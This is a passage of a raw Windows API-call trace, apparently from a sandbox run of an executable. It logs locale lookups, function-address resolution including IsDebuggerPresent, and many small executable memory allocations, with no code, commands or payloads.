uID=0xffeb, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.934] LoadStringA (in: hInstance=0x300000, uID=0xffec, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.934] LoadStringA (in: hInstance=0x300000, uID=0xffe9, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.934] LoadStringA (in: hInstance=0x300000, uID=0xffe8, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.934] LoadStringA (in: hInstance=0x300000, uID=0xffe6, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.934] LoadStringA (in: hInstance=0x300000, uID=0xffe5, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.934] LoadStringA (in: hInstance=0x300000, uID=0xffe4, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.934] LoadStringA (in: hInstance=0x300000, uID=0xffe3, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.934] LoadStringA (in: hInstance=0x300000, uID=0xffe2, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.934] LoadStringA (in: hInstance=0x300000, uID=0xffe1, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.934] LoadStringA (in: hInstance=0x300000, uID=0xffe0, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.934] LoadStringA (in: hInstance=0x300000, uID=0xffff, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.934] LoadStringA (in: hInstance=0x300000, uID=0xfffe, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.934] LoadStringA (in: hInstance=0x300000, uID=0xfffd, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.934] LoadStringA (in: hInstance=0x300000, uID=0xfffc, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.934] LoadStringA (in: hInstance=0x300000, uID=0xfffb, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.934] LoadStringA (in: hInstance=0x300000, uID=0xfffa, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.934] LoadStringA (in: hInstance=0x300000, uID=0xfff9, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.965] LoadStringA (in: hInstance=0x300000, uID=0xfff7, lpBuffer=0x18fa9c, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.965] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0xa84aa8 [0240.965] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x23f0000 [0240.965] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0xa85aa8 [0240.965] VirtualAlloc (lpAddress=0x23f0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x23f0000 [0240.966] LoadStringA (in: hInstance=0x300000, uID=0xffe7, lpBuffer=0x18fa9c, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.972] GetThreadLocale () returned 0x409 [0240.972] GetSystemMetrics (nIndex=74) returned 0 [0240.983] GetSystemMetrics (nIndex=42) returned 0 [0240.989] GetThreadLocale () returned 0x409 [0240.989] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Jan") returned 4 [0240.989] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd04, cchData=256 | out: lpLCData="January") returned 8 [0240.989] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Feb") returned 4 [0240.989] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd04, cchData=256 | out: lpLCData="February") returned 9 [0240.989] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Mar") returned 4 [0240.989] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd04, cchData=256 | out: lpLCData="March") returned 6 [0240.989] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Apr") returned 4 [0240.989] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd04, cchData=256 | out: lpLCData="April") returned 6 [0240.989] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd04, cchData=256 | out: lpLCData="May") returned 4 [0240.989] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd04, cchData=256 | out: lpLCData="May") returned 4 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Jun") returned 4 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd04, cchData=256 | out: lpLCData="June") returned 5 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Jul") returned 4 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd04, cchData=256 | out: lpLCData="July") returned 5 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Aug") returned 4 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd04, cchData=256 | out: lpLCData="August") returned 7 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Sep") returned 4 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd04, cchData=256 | out: lpLCData="September") returned 10 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Oct") returned 4 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd04, cchData=256 | out: lpLCData="October") returned 8 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Nov") returned 4 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd04, cchData=256 | out: lpLCData="November") returned 9 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Dec") returned 4 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd04, cchData=256 | out: lpLCData="December") returned 9 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Sun") returned 4 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Sunday") returned 7 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Mon") returned 4 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Monday") returned 7 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Tue") returned 4 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Tuesday") returned 8 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Wed") returned 4 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Wednesday") returned 10 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Thu") returned 4 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Thursday") returned 9 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Fri") returned 4 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Friday") returned 7 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Sat") returned 4 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Saturday") returned 9 [0240.990] GetThreadLocale () returned 0x409 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fd60, cchData=256 | out: lpLCData="$") returned 2 [0240.990] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0240.996] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0240.996] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fe58, cchData=2 | out: lpLCData=",") returned 2 [0240.996] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fe58, cchData=2 | out: lpLCData=".") returned 2 [0240.997] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fd60, cchData=256 | out: lpLCData="2") returned 2 [0240.997] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fe58, cchData=2 | out: lpLCData="/") returned 2 [0240.997] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fd60, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0240.997] GetThreadLocale () returned 0x409 [0240.997] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd30, cchData=256 | out: lpLCData="1") returned 2 [0240.997] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fd60, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0240.997] GetThreadLocale () returned 0x409 [0240.997] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd30, cchData=256 | out: lpLCData="1") returned 2 [0240.997] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fe58, cchData=2 | out: lpLCData=":") returned 2 [0240.997] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fd60, cchData=256 | out: lpLCData="AM") returned 3 [0240.997] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fd60, cchData=256 | out: lpLCData="PM") returned 3 [0240.997] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0240.997] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0240.997] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0240.997] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fe58, cchData=2 | out: lpLCData=",") returned 2 [0240.997] GetVersionExA (in: lpVersionInformation=0x18fe2c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x23f030c, dwMinorVersion=0x23f02fc, dwBuildNumber=0x30, dwPlatformId=0x3022c9, szCSDVersion="Äþ\x18") | out: lpVersionInformation=0x18fe2c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0240.997] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0240.997] GetProcAddress (hModule=0x769b0000, lpProcName="GetDiskFreeSpaceExA") returned 0x76a448ef [0241.022] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x18fd40 | out: lpWSAData=0x18fd40) returned 0 [0241.057] GetCurrentThreadId () returned 0xfb4 [0241.063] VirtualAlloc (lpAddress=0x23f4000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x23f4000 [0241.150] GetLocalTime (in: lpSystemTime=0x18feb8 | out: lpSystemTime=0x18feb8*(wYear=0x7e6, wMonth=0x1, wDayOfWeek=0x2, wDay=0xb, wHour=0x12, wMinute=0x34, wSecond=0x15, wMilliseconds=0x363)) [0241.151] GetSystemTime (in: lpSystemTime=0x18feb4 | out: lpSystemTime=0x18feb4*(wYear=0x7e6, wMonth=0x1, wDayOfWeek=0x2, wDay=0xb, wHour=0x11, wMinute=0x34, wSecond=0x15, wMilliseconds=0x363)) [0241.157] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0 [0241.158] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0241.158] GetCurrentProcess () returned 0xffffffff [0241.158] GetProcessAffinityMask (in: hProcess=0xffffffff, lpProcessAffinityMask=0x18ff00, lpSystemAffinityMask=0x18fefc | out: lpProcessAffinityMask=0x18ff00, lpSystemAffinityMask=0x18fefc) returned 1 [0241.165] VirtualAlloc (lpAddress=0x2418000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x2418000 [0241.214] VirtualFree (lpAddress=0x2438000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0241.221] GetModuleHandleA (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0241.221] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0241.221] GetProcAddress (hModule=0x769b0000, lpProcName="LoadLibraryA") returned 0x769c498f [0241.222] GetProcAddress (hModule=0x769b0000, lpProcName="MapViewOfFile") returned 0x769c18d1 [0241.222] GetProcAddress (hModule=0x769b0000, lpProcName="FindResourceA") returned 0x769de98b [0241.222] GetProcAddress (hModule=0x769b0000, lpProcName="IsBadReadPtr") returned 0x769ed065 [0241.222] GetProcAddress (hModule=0x769b0000, lpProcName="UnmapViewOfFile") returned 0x769c1806 [0241.222] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0241.222] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileMappingA") returned 0x769c54be [0241.222] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileA") returned 0x769c537e [0241.222] GetProcAddress (hModule=0x769b0000, lpProcName="IsDebuggerPresent") returned 0x769c4a15 [0241.223] GetProcAddress (hModule=0x769b0000, lpProcName="GetSystemTime") returned 0x769c5a4e [0241.223] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0241.223] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0241.223] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentProcessId") returned 0x769c11f8 [0241.223] LoadLibraryA (lpLibFileName="NTDLL.DLL") returned 0x779e0000 [0241.223] LoadLibraryA (lpLibFileName="ADVAPI32.DLL") returned 0x76c20000 [0241.224] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0241.224] GetProcAddress (hModule=0x769b0000, lpProcName="RaiseException") returned 0x769c585e [0241.224] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0241.224] GetProcAddress (hModule=0x769b0000, lpProcName="SetLastError") returned 0x769c11a9 [0241.224] VirtualAlloc (lpAddress=0x0, dwSize=0x11, flAllocationType=0x1000, flProtect=0x40) returned 0x220000 [0241.224] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x1000, flProtect=0x40) returned 0x230000 [0241.225] VirtualAlloc (lpAddress=0x2438000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x2438000 [0241.232] VirtualAlloc (lpAddress=0x0, dwSize=0xbb, flAllocationType=0x1000, flProtect=0x40) returned 0x240000 [0241.232] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x1000, flProtect=0x40) returned 0x250000 [0241.232] VirtualAlloc (lpAddress=0x0, dwSize=0x83, flAllocationType=0x1000, flProtect=0x40) returned 0x260000 [0241.233] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x1000, flProtect=0x40) returned 0x270000 [0241.233] VirtualAlloc (lpAddress=0x0, dwSize=0x437, flAllocationType=0x1000, flProtect=0x40) returned 0x360000 [0241.233] VirtualAlloc (lpAddress=0x0, dwSize=0x1c9, flAllocationType=0x1000, flProtect=0x40) returned 0x370000 [0241.234] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x1000, flProtect=0x40) returned 0x380000 [0241.234] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0x390000 [0241.234] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x1000, flProtect=0x40) returned 0x3a0000 [0241.235] VirtualAlloc (lpAddress=0x0, dwSize=0xaf, flAllocationType=0x1000, flProtect=0x40) returned 0x3b0000 [0241.235] VirtualAlloc (lpAddress=0x2460000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2460000 [0241.236] GetCurrentProcessId () returned 0xfb0 [0241.236] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3c0000 [0241.236] VirtualAlloc (lpAddress=0x0, dwSize=0xbf, flAllocationType=0x1000, flProtect=0x40) returned 0x3d0000 [0241.236] VirtualAlloc (lpAddress=0x0, dwSize=0xa5, flAllocationType=0x1000, flProtect=0x40) returned 0x3e0000 [0241.237] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x1000, flProtect=0x40) returned 0x3f0000 [0241.237] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x1000, flProtect=0x40) returned 0x9a0000 [0241.237] VirtualAlloc (lpAddress=0x0, dwSize=0x89, flAllocationType=0x1000, flProtect=0x40) returned 0x9b0000 [0241.238] VirtualAlloc (lpAddress=0x0, dwSize=0xd4, flAllocationType=0x1000, flProtect=0x40) returned 0x9c0000 [0241.238] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x9d0000 [0241.238] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x1000, flProtect=0x40) returned 0x9e0000 [0241.239] VirtualAlloc (lpAddress=0x0, dwSize=0x17c, flAllocationType=0x1000, flProtect=0x40) returned 0x9f0000 [0241.239] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x1000, flProtect=0x40) returned 0xa00000 [0241.240] GetCurrentProcessId () returned 0xfb0 [0241.240] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0xa10000 [0241.240] VirtualAlloc (lpAddress=0x0, dwSize=0x284, flAllocationType=0x1000, flProtect=0x40) returned 0xa20000 [0241.240] VirtualAlloc (lpAddress=0x0, dwSize=0x37d, flAllocationType=0x1000, flProtect=0x40) returned 0xa30000 [0241.241] VirtualAlloc (lpAddress=0x0, dwSize=0xb9, flAllocationType=0x1000, flProtect=0x40) returned 0xa40000 [0241.241] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x1000, flProtect=0x40) returned 0xa50000 [0241.241] VirtualAlloc (lpAddress=0x0, dwSize=0x91, flAllocationType=0x1000, flProtect=0x40) returned 0xa60000 [0241.242] VirtualAlloc (lpAddress=0x0, dwSize=0x87, flAllocationType=0x1000, flProtect=0x40) returned 0xb70000 [0241.242] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x1000, flProtect=0x40) returned 0xb80000 [0241.243] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0xb90000 [0241.243] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0xba0000 [0241.243] VirtualAlloc (lpAddress=0x0, dwSize=0xb9, flAllocationType=0x1000, flProtect=0x40) returned 0xbb0000 [0241.244] GetCurrentProcessId () returned 0xfb0 [0241.244] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0xbc0000 [0241.244] VirtualAlloc (lpAddress=0x0, dwSize=0x149, flAllocationType=0x1000, flProtect=0x40) returned 0xbd0000 [0241.245] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0xbe0000 [0241.245] VirtualAlloc (lpAddress=0x0, dwSize=0x11d, flAllocationType=0x1000, flProtect=0x40) returned 0xbf0000 [0241.245] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x1000, flProtect=0x40) returned 0xc00000 [0241.246] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0xc10000 [0241.246] VirtualAlloc (lpAddress=0x0, dwSize=0xad, flAllocationType=0x1000, flProtect=0x40) returned 0xc60000 [0241.247] VirtualAlloc (lpAddress=0x0, dwSize=0xa5, flAllocationType=0x1000, flProtect=0x40) returned 0xc70000 [0241.247] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0xc80000 [0241.248] VirtualAlloc (lpAddress=0x0, dwSize=0x3b1, flAllocationType=0x1000, flProtect=0x40) returned 0xc90000 [0241.248] VirtualAlloc (lpAddress=0x0, dwSize=0xab, flAllocationType=0x1000, flProtect=0x40) returned 0xca0000 [0241.248] GetCurrentProcessId () returned 0xfb0 [0241.248] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0xcb0000 [0241.249] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0x25d0000 [0241.249] VirtualAlloc (lpAddress=0x0, dwSize=0xb1, flAllocationType=0x1000, flProtect=0x40) returned 0x25e0000 [0241.250] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x1000, flProtect=0x40) returned 0x25f0000 [0241.251] VirtualAlloc (lpAddress=0x0, dwSize=0x1df, flAllocationType=0x1000, flProtect=0x40) returned 0x2600000 [0241.252] VirtualAlloc (lpAddress=0x0, dwSize=0x8c, flAllocationType=0x1000, flProtect=0x40) returned 0x2610000 [0241.252] VirtualAlloc (lpAddress=0x0, dwSize=0x189, flAllocationType=0x1000, flProtect=0x40) returned 0x2620000 [0241.253] VirtualAlloc (lpAddress=0x0, dwSize=0x483, flAllocationType=0x1000, flProtect=0x40) returned 0x2940000 [0241.253] VirtualAlloc (lpAddress=0x0, dwSize=0xb4, flAllocationType=0x1000, flProtect=0x40) returned 0x2950000 [0241.254] VirtualAlloc (lpAddress=0x0, dwSize=0x247, flAllocationType=0x1000, flProtect=0x40) returned 0x2960000 [0241.254] VirtualAlloc (lpAddress=0x0, dwSize=0xaf, flAllocationType=0x1000, flProtect=0x40) returned 0x2970000 [0241.255] GetCurrentProcessId () returned 0xfb0 [0241.255] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2980000 [0241.255] VirtualAlloc (lpAddress=0x0, dwSize=0xe2, flAllocationType=0x1000, flProtect=0x40) returned 0x2990000 [0241.256] VirtualAlloc (lpAddress=0x0, dwSize=0x89, flAllocationType=0x1000, flProtect=0x40) returned 0x29a0000 [0241.256] VirtualAlloc (lpAddress=0x0, dwSize=0x9f, flAllocationType=0x1000, flProtect=0x40) returned 0x29b0000 [0241.257] VirtualAlloc (lpAddress=0x0, dwSize=0xa5, flAllocationType=0x1000, flProtect=0x40) returned 0x29c0000 [0241.257] VirtualAlloc (lpAddress=0x0, dwSize=0xc4, flAllocationType=0x1000, flProtect=0x40) returned 0x29d0000 [0241.258] VirtualAlloc (lpAddress=0x0, dwSize=0x95, flAllocationType=0x1000, flProtect=0x40) returned 0x29e0000 [0241.258] VirtualAlloc (lpAddress=0x0, dwSize=0xcc, flAllocationType=0x1000, flProtect=0x40) returned 0x29f0000 [0241.259] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x1000, flProtect=0x40) returned 0x2a00000 [0241.259] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x1000, flProtect=0x40) returned 0x2a10000 [0241.260] VirtualAlloc (lpAddress=0x0, dwSize=0xa7, flAllocationType=0x1000, flProtect=0x40) returned 0x2a20000 [0241.260] VirtualAlloc (lpAddress=0x2464000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2464000 [0241.261] GetCurrentProcessId () returned 0xfb0 [0241.261] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2a30000 [0241.262] VirtualAlloc (lpAddress=0x0, dwSize=0xd1, flAllocationType=0x1000, flProtect=0x40) returned 0x2a40000 [0241.262] VirtualAlloc (lpAddress=0x0, dwSize=0xbb, flAllocationType=0x1000, flProtect=0x40) returned 0x2a50000 [0241.263] VirtualAlloc (lpAddress=0x0, dwSize=0xa7, flAllocationType=0x1000, flProtect=0x40) returned 0x2a60000 [0241.263] VirtualAlloc (lpAddress=0x0, dwSize=0xc4, flAllocationType=0x1000, flProtect=0x40) returned 0x2a70000 [0241.264] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x1000, flProtect=0x40) returned 0x2a80000 [0241.264] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x1000, flProtect=0x40) returned 0x2a90000 [0241.264] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x1000, flProtect=0x40) returned 0x2aa0000 [0241.265] VirtualAlloc (lpAddress=0x0, dwSize=0x17e, flAllocationType=0x1000, flProtect=0x40) returned 0x2ab0000 [0241.265] VirtualAlloc (lpAddress=0x0, dwSize=0x1b1, flAllocationType=0x1000, flProtect=0x40) returned 0x2ac0000 [0241.266] VirtualAlloc (lpAddress=0x0, dwSize=0xa3, flAllocationType=0x1000, flProtect=0x40) returned 0x2ad0000 [0241.266] GetCurrentProcessId () returned 0xfb0 [0241.266] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2ae0000 [0241.266] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x1000, flProtect=0x40) returned 0x2af0000 [0241.267] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0x2b00000 [0241.267] VirtualAlloc (lpAddress=0x0, dwSize=0xbb, flAllocationType=0x1000, flProtect=0x40) returned 0x2b10000 [0241.267] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x1000, flProtect=0x40) returned 0x2b20000 [0241.268] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0x2b30000 [0241.268] VirtualAlloc (lpAddress=0x0, dwSize=0xfa, flAllocationType=0x1000, flProtect=0x40) returned 0x2b40000 [0241.268] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x1000, flProtect=0x40) returned 0x2b50000 [0241.269] VirtualAlloc (lpAddress=0x0, dwSize=0xb4, flAllocationType=0x1000, flProtect=0x40) returned 0x2b60000 [0241.269] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x1000, flProtect=0x40) returned 0x2b70000 [0241.269] VirtualAlloc (lpAddress=0x0, dwSize=0x328, flAllocationType=0x1000, flProtect=0x40) returned 0x2b80000 [0241.270] GetCurrentProcessId () returned 0xfb0 [0241.270] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2b90000 [0241.270] VirtualAlloc (lpAddress=0x0, dwSize=0x9f, flAllocationType=0x1000, flProtect=0x40) returned 0x2ba0000 [0241.271] VirtualAlloc (lpAddress=0x0, dwSize=0xb4, flAllocationType=0x1000, flProtect=0x40) returned 0x2bb0000 [0241.271] VirtualAlloc (lpAddress=0x0, dwSize=0x1a2, flAllocationType=0x1000, flProtect=0x40) returned 0x2bc0000 [0241.271] VirtualAlloc (lpAddress=0x0, dwSize=0x8d, flAllocationType=0x1000, flProtect=0x40) returned 0x2bd0000 [0241.272] VirtualAlloc (lpAddress=0x0, dwSize=0x95, flAllocationType=0x1000, flProtect=0x40) returned 0x2be0000 [0241.272] VirtualAlloc (lpAddress=0x0, dwSize=0x293, flAllocationType=0x1000, flProtect=0x40) returned 0x2bf0000 [0241.273] VirtualAlloc (lpAddress=0x0, dwSize=0x8c, flAllocationType=0x1000, flProtect=0x40) returned 0x2c00000 [0241.273] VirtualAlloc (lpAddress=0x0, dwSize=0x14f, flAllocationType=0x1000, flProtect=0x40) returned 0x2c10000 [0241.273] VirtualAlloc (lpAddress=0x0, dwSize=0xc1, flAllocationType=0x1000, flProtect=0x40) returned 0x2c20000 [0241.274] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x1000, flProtect=0x40) returned 0x2c30000 [0241.274] 